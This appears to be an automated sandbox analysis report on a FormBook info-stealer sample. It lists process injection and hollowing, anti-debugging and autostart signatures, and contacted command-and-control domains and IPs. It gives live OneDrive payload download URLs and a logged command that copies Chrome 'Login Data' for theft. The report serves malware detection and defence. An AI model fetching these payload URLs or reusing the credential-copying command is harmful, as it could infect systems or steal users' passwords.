Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h] 5_2_03C56C0A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h] 5_2_03C56C0A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h] 5_2_03C56C0A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h] 5_2_03C56C0A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF746D mov eax, dword ptr fs:[00000030h] 5_2_03BF746D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0BC2C mov eax, dword ptr fs:[00000030h] 5_2_03C0BC2C
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A50 NtCreateFile,LdrInitializeThunk, 5_2_03C19A50

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: IconCachet0hh.exe.7.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.gografic.com
Source: C:\Windows\explorer.exe Network Connect: 154.55.180.56 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.moneytaoism.com
Source: C:\Windows\explorer.exe Domain query: www.naturathome.info
Source: C:\Windows\explorer.exe Domain query: www.6111.site
Source: C:\Windows\explorer.exe Network Connect: 5.183.8.187 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 38.54.163.57 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.kidsfundoor.com
Source: C:\Windows\explorer.exe Domain query: www.choonchain.com
Source: C:\Windows\explorer.exe Domain query: www.empireapothecary.com
Source: C:\Windows\explorer.exe Domain query: www.huangse5.com
Source: C:\Windows\explorer.exe Domain query: www.nutricognition.com
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.218 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.158 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.trisuaka.xyz
Source: C:\Windows\explorer.exe Domain query: www.trendiddas.com
Source: C:\Windows\explorer.exe Domain query: www.nomaxdic.com
Source: C:\Windows\explorer.exe Network Connect: 188.114.97.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 156.226.60.131 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.designgamagazine.com
Source: C:\Windows\explorer.exe Domain query: www.shopwithtrooperdavecom.com
Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\cmd.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1080000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 50410000 Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 3430000 Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 3440000 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 50410000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3430000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3440000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 50410000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\cmd.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 3968 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3968
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\TR0627729920002.exe Thread created: C:\Windows\SysWOW64\cmd.exe EIP: 3440000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\TR0627729920002.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: explorer.exe, 00000007.00000000.350508051.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.281636648.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.441279364.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000007.00000000.291986070.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.362079139.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.358486470.0000000005920000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.350564915.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.374071514.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.441429603.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680563 Sample: TR0627729920002.exe Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 61 www.wellkept.info 2->61 63 www.meigsbuilds.online 2->63 65 3 other IPs or domains 2->65 99 Snort IDS alert for network traffic 2->99 101 Multi AV Scanner detection for domain / URL 2->101 103 Malicious sample detected (through community Yara rule) 2->103 105 6 other signatures 2->105 11 TR0627729920002.exe 1 18 2->11         started        signatures3 process4 dnsIp5 73 l-0004.l-dc-msedge.net 13.107.43.13, 443, 49728, 49737 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 11->73 75 192.168.2.1 unknown unknown 11->75 77 3 other IPs or domains 11->77 57 C:\Users\Public\Libraries\Jwjxmakrv.exe, PE32 11->57 dropped 59 C:\Users\...\Jwjxmakrv.exe:Zone.Identifier, ASCII 11->59 dropped 129 Creates multiple autostart registry keys 11->129 131 Writes to foreign memory regions 11->131 133 Allocates memory in foreign processes 11->133 135 2 other signatures 11->135 16 cmd.exe 1 11->16         started        file6 signatures7 process8 signatures9 91 Modifies the context of a thread in another process (thread injection) 16->91 93 Maps a DLL or memory area into another process 16->93 95 Sample uses process hollowing technique 16->95 97 2 other signatures 16->97 19 explorer.exe 1 8 16->19 injected 24 conhost.exe 16->24         started        process10 dnsIp11 67 naturathome.info 81.169.145.158, 49823, 80 STRATOSTRATOAGDE Germany 19->67 69 www.trendiddas.com 5.183.8.187, 49855, 80 INTERXSCH Germany 19->69 71 17 other IPs or domains 19->71 55 C:\Users\user\AppData\...\IconCachet0hh.exe, PE32 19->55 dropped 109 System process connects to network (likely due to code injection or exploit) 19->109 111 Benign windows process drops PE files 19->111 113 Performs DNS queries to domains with low reputation 19->113 115 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 19->115 26 rundll32.exe 12 19->26         started        29 Jwjxmakrv.exe 16 19->29         started        32 Jwjxmakrv.exe 16 19->32         started        34 IconCachet0hh.exe 19->34         started        file12 signatures13 process14 dnsIp15 117 Tries to steal Mail credentials (via file / registry access) 26->117 119 Creates multiple autostart registry keys 26->119 121 Tries to harvest and steal browser information (history, passwords, etc) 26->121 127 3 other signatures 26->127 36 cmd.exe 26->36         started        39 cmd.exe 26->39         started        79 l-0003.l-dc-msedge.net 13.107.43.12, 443, 49746, 49748 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 29->79 81 ph-files.fe.1drv.com 29->81 87 2 other IPs or domains 29->87 123 Multi AV Scanner detection for dropped file 29->123 125 Machine Learning detection for dropped file 29->125 41 cmd.exe 1 29->41         started        83 ph-files.fe.1drv.com 32->83 85 onedrive.live.com 32->85 89 2 other IPs or domains 32->89 43 cmd.exe 1 32->43         started        45 conhost.exe 34->45         started        signatures16 process17 signatures18 107 Tries to harvest and steal browser information (history, passwords, etc) 36->107 47 conhost.exe 36->47         started        49 conhost.exe 39->49         started        51 conhost.exe 41->51         started        53 conhost.exe 43->53         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
81.169.145.158
 naturathome.info Germany
6724 STRATOSTRATOAGDE true
198.54.117.218
 parkingpage.namecheap.com United States
22612 NAMECHEAP-NETUS false
154.55.180.56
 www.empireapothecary.com United States
174 COGENT-174US true
13.107.43.12
 l-0003.l-dc-msedge.net United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
13.107.43.13
 l-0004.l-dc-msedge.net United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
5.183.8.187
 www.trendiddas.com Germany
64463 INTERXSCH true
188.114.97.3
 www.trisuaka.xyz European Union
13335 CLOUDFLARENETUS true
156.226.60.131
 www.moneytaoism.com Seychelles
133201 COMING-ASABCDEGROUPCOMPANYLIMITEDHK true
34.102.136.180
 nutricognition.com United States
15169 GOOGLEUS false
38.54.163.57
 www.nomaxdic.com United States
174 COGENT-174US true
2.57.90.16
 kidsfundoor.com Lithuania
47583 AS-HOSTINGERLT true
209.17.116.163
 www.meigsbuilds.online United States
55002 DEFENSE-NETUS true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
www.trisuaka.xyz 188.114.97.3 true
kidsfundoor.com 2.57.90.16 true
www.trendiddas.com 5.183.8.187 true
l-0003.l-dc-msedge.net 13.107.43.12 true
www.moneytaoism.com 156.226.60.131 true
parkingpage.namecheap.com 198.54.117.218 true
forummind.com 35.244.105.10 true
naturathome.info 81.169.145.158 true
l-0004.l-dc-msedge.net 13.107.43.13 true
nutricognition.com 34.102.136.180 true
www.nomaxdic.com 38.54.163.57 true
wellkept.info 15.197.142.173 true
www.empireapothecary.com 154.55.180.56 true
www.meigsbuilds.online 209.17.116.163 true
www.gografic.com unknown unknown
2q5ira.ph.files.1drv.com unknown unknown
www.naturathome.info unknown unknown
www.6111.site unknown unknown
www.wellkept.info unknown unknown
www.forummind.com unknown unknown
onedrive.live.com unknown unknown
www.designgamagazine.com unknown unknown
www.kidsfundoor.com unknown unknown
www.choonchain.com unknown unknown
www.shopwithtrooperdavecom.com unknown unknown
www.huangse5.com unknown unknown
www.nutricognition.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.trisuaka.xyz/uj3c/ true
  • Avira URL Cloud: malware
 unknown
http://www.nomaxdic.com/uj3c/ true
  • Avira URL Cloud: malware
 unknown
https://2q5ira.ph.files.1drv.com/y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa0cxGRrCYES6g2a0zaTIakDGUvozKOJciyD6JCpNiyjHZcmfPyDooT0h1JU_O8sSkgYGocwmlALM_59Ui23ibnwkt9D4viRLcZLL1t6g8vn3_wThdv1B88C73FcDGQ4N13iZgpf-DIJjM28kjlru3Pg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 false
    		high
    https://2q5ira.ph.files.1drv.com/y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPibKAFYV0xjQdV9_Sbrn3WQnCWQVi51NO3WbiwMfOxjZCKscbz07KqgJxS1eQqwWI1nY5Nm6kgY9vMOzq0OAhg_-tnzDbDTvoJ8m9VvdOhZc335o19UrBupw81DRG4jFsQqG8OamsctZsRjc20RRa-w/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 false
      		high
      www.nutricognition.com/uj3c/ true
      • Avira URL Cloud: malware
      		 low
      https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I false
        		high